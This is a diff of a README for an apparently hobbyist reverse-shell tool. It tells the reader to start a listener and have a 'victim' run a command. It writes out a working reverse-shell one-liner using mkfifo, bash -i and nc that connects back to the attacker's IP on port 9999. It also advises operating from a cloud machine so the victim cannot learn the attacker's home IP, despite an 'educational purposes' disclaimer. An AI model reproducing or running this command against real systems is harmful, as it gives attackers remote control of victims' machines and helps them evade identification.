Hirukshacoder/T-Tools-advanced--cyber-security/README.md

 # Reverse shells

-To use the listener change the ip in listener.py and run it to start listening
+To use the listener change the ip in net.py and run it to start listening

-Then send the run.py file to your victim.
+Makesure you add your ip to the victim's command.

+* Guidlines

+> Always use a cloud linux machine or another os in the cloud, because when the victim type the command he can grab your home network ip.

+> And this tool is only for educational purposes.

     kali@attacker ~ $ python3 listen.py
-    kali@victim ~ $ mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 0.0.0.0 9999 >/tmp/f
+    kali@victim ~ $ mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc <add your ip> 9999 >/tmp/f

-made by Treveen
+Made with 💖 by THB